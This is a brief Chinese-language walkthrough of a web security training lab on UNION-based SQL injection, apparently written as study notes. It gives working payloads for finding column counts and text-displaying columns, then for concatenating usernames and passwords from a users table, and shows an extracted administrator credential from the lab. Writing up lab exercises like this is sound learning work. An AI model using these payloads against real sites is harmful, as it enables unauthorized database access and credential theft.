Web SQL injection Lab10

# Web SQL injection Lab10 一樣登入加攔截請求。 ![image](https://hackmd.io/_uploads/SJ-QpmVQxg.png) ![image](https://hackmd.io/_uploads/r1GBpm4Qgl.png) 接著找出欄位數量，而且這次的題目需要測試哪個欄位可以顯示出文字。 ``` '+UNION+SELECT+NULL,NULL-- ``` ![image](https://hackmd.io/_uploads/SymPaQNmxx.png) ``` '+UNION+SELECT+'abc',NULL-- ``` ![image](https://hackmd.io/_uploads/H1URa7Nmle.png) ``` '+UNION+SELECT+NULL,'abc'-- ``` ![image](https://hackmd.io/_uploads/ry52TXNQee.png) 由於本題的考點是文字合併的技巧，所以我把使用者帳密合併起來並顯示在畫面上。 ``` '+UNION+SELECT+NULL,username||'~'||password+FROM+users-- ``` - `||'~'||`：合併兩字串 ![image](https://hackmd.io/_uploads/SymYCXV7ll.png) 取得帳密並登入試試。 `administrator~rwt325xzi3r4ypoq7l3j` ![image](https://hackmd.io/_uploads/S1wM1E4Qex.png)